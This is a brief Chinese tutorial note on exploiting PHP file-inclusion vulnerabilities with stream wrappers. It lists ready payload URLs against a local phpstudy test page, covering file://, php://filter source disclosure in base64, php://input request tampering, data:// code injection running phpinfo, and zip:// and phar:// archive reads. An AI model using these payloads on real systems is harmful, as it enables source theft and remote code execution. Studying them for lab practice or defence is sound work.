文件包含PHP伪协议利用方法

一.file://

使⽤： file:// ⽂件的绝对路径和⽂件名

123.php?cmd=file://D:\xuexi\xiaopi\phpstudy_pro\www\123.txt

二.php://filter

123.php?cmd=php://filter/read=convert.base64-encode/resource=1.php

三.php://input

步骤一：123.php?cmd=php://input抓包

步骤二，右键修改请求方法，修改数据包

步骤三，放行访问

四.data://

⽤途：数据（ RFC2397 ）

123.php?cmd=data:text/plain,<?php phpinfo();?>

五.zip://

⽤途：读取压缩包内的⽂件（绝对路径 / 相对路径）

123.php?cmd=zip://D:\phpstudy_pro\WWW\2.zip%232.txt

六.phar://

⽤途：读取压缩包内的⽂件（绝对路径 / 相对路径）

123.php?cmd=phar://D:\phpstudy_pro\WWW\2.zip\2.txt